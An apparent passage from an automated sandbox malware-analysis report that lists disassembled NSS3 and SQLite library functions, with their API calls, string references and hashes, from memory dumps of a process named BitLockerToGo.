                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                                                                                                                          • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 95ae6840e3a57ccb9b5e99de488786dce62fbf95eee93a848fa6911c7141639d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8bb65205cf132d75e24fe9fc901638923874ddb330d036f44d018464ec3c92a7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95ae6840e3a57ccb9b5e99de488786dce62fbf95eee93a848fa6911c7141639d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19314FB1A00218AFEF11AF64CD48BAABBB8FF4A345F044175FA0992250EB305995CF65
                                                                                                                                                                                                                                                                                                                                                          Function 6C633D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C633DFB
                                                                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C633EEC
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C633FA3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C634047
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6340DE
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C63415F
                                                                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C63416B
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C634288
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6342AB
                                                                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C6342B7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                                                                                                                                                          • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 703928654-3678606288
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7751df27761850c232e1593c8a612a60a626b6e15fdde9b025a4a47d1ac10574
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 40961d99e09820e11a64e8aedb440fcb0c92419e826baa0a8fb378904b95c740
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7751df27761850c232e1593c8a612a60a626b6e15fdde9b025a4a47d1ac10574
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F16471A087408FD715CF38C880BABFBF6AF85304F10AA2DF48997651EB71D8468B46
                                                                                                                                                                                                                                                                                                                                                          Function 6C5E1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E1D58
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5E1EFD
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C5E1FB7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C5E1F83
                                                                                                                                                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 6C5E20CA
                                                                                                                                                                                                                                                                                                                                                          • no more rows available, xrefs: 6C5E2264
                                                                                                                                                                                                                                                                                                                                                          • unknown error, xrefs: 6C5E2291
                                                                                                                                                                                                                                                                                                                                                          • sqlite_temp_master, xrefs: 6C5E1C5C
                                                                                                                                                                                                                                                                                                                                                          • another row available, xrefs: 6C5E2287
                                                                                                                                                                                                                                                                                                                                                          • unsupported file format, xrefs: 6C5E2188
                                                                                                                                                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 6C5E2223
                                                                                                                                                                                                                                                                                                                                                          • sqlite_master, xrefs: 6C5E1C61
                                                                                                                                                                                                                                                                                                                                                          • table, xrefs: 6C5E1C8B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                                                                                                                          • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 06aaceab938c9cfcd0afd2d22c3d0b7733eda69030daa40113f705a1f91c97f2
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8342a53a51849f60457d5aea12e47577b76b929f68c2c201fe7eb81c45093eaa
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06aaceab938c9cfcd0afd2d22c3d0b7733eda69030daa40113f705a1f91c97f2
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A712E2706083428FD715CF19CC84A5ABBF2BF89318F18896DE8958BB56D731EC45CB92
                                                                                                                                                                                                                                                                                                                                                          Function 6C6AEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6ADAE2,?), ref: 6C6AC6C2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AF0AE
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AF0C8
                                                                                                                                                                                                                                                                                                                                                          • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C6AF101
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AF11D
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C77218C), ref: 6C6AF183
                                                                                                                                                                                                                                                                                                                                                          • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C6AF19A
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6AF1CB
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6AF1EF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C6AF210
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C6AF1E9,?,00000000,?,?), ref: 6C6552F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C65530F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C655326
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C6AF1E9,?,00000000,?,?), ref: 6C655340
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6AF227
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C6AF23E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C64E708,00000000,00000000,00000004,00000000), ref: 6C69BE6A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6504DC,?), ref: 6C69BE7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C69BEC2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6AF2BB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C6AF3A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6AF3B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C652D20: PK11_DestroyObject.NSS3(?,?), ref: 6C652D3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C652D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C652D5F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1559028977-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d92be8fbebf74752fcaaf11a2f74866d854dc302c72d9325c4ae94115c7fce6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1bbc2820c64ca702d03ddd1d6fdc97257225fc469eb2c2831c14790637dd1f60
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d92be8fbebf74752fcaaf11a2f74866d854dc302c72d9325c4ae94115c7fce6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD190B5E016059FDB10CFE9D880A9EB7F5EF49308F158029E915A7711EB31EC06CB9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C667D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C667DDC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C667DF3
                                                                                                                                                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C667F07
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetPadMechanism.NSS3(00000000), ref: 6C667F57
                                                                                                                                                                                                                                                                                                                                                          • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C667F98
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C667FC9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C667FDE
                                                                                                                                                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C668000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C689430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C667F0C,?,00000000,00000000,00000000,?), ref: 6C68943B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C689430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C68946B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C689430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C689546
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C668110
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C66811D
                                                                                                                                                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C66822D
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C66823C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1923011919-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d6ef1bbae7569d927ab78dd1a983d44b264fc4b8b15339a6e9dca73a4f93b459
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f1bb3e08b51969067f05ba4c87baa7371a9997d0376b0ca609ffbcabf4c8e85
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6ef1bbae7569d927ab78dd1a983d44b264fc4b8b15339a6e9dca73a4f93b459
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2C185B1D002599FDB21CF25CC40FDAB7B8AF0A308F0085E5E91DA6A51E7319E85CFA5
                                                                                                                                                                                                                                                                                                                                                          Function 6C5DAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31,?,?,?,?,?,?,?), ref: 6C5DB039
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31), ref: 6C5DB090
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31), ref: 6C5DB0A2
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31,?,?,?,?,?,?,?,?,?), ref: 6C5DB100
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31,?,?,?,?,?,?,?), ref: 6C5DB115
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31), ref: 6C5DB12D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C5DC6FD,?,?,?,?,6C62F965,00000000), ref: 6C5C9F0E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C62F965,00000000), ref: 6C5C9F5D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                                                                                                                          • String ID: `ul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3155957115-2372496824
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f37fa78a8e52e5c7b9af66a1433cefe8c7970f13bea44d22f00f68649f6e612b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6041cd750b52bc4f6ffc6d8e1eb934f447f6f5e14ef46c1276cb605460a3af3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f37fa78a8e52e5c7b9af66a1433cefe8c7970f13bea44d22f00f68649f6e612b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4291BAB0A04306CBEB04DF69DC84A6BB7B2BF85308F154A6DE41697A50EB31F840CB56
                                                                                                                                                                                                                                                                                                                                                          Function 6C670EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6C670F8D
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C670FB3
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C671006
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C67101C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C671033
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C67103F
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C671048
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C67108E
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6710BB
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6710D6
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C67112E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C6708C4,?,?), ref: 6C6715B8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C6708C4,?,?), ref: 6C6715C1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C67162E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C671637
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aaa37ebe19d98722cfa555772574c901b830a67e21b265247409dddacb83d1c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a5d26078c820aaeb473737c873be0fb8f14ad3db5cdc754a4c873e46bf05926b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa37ebe19d98722cfa555772574c901b830a67e21b265247409dddacb83d1c4
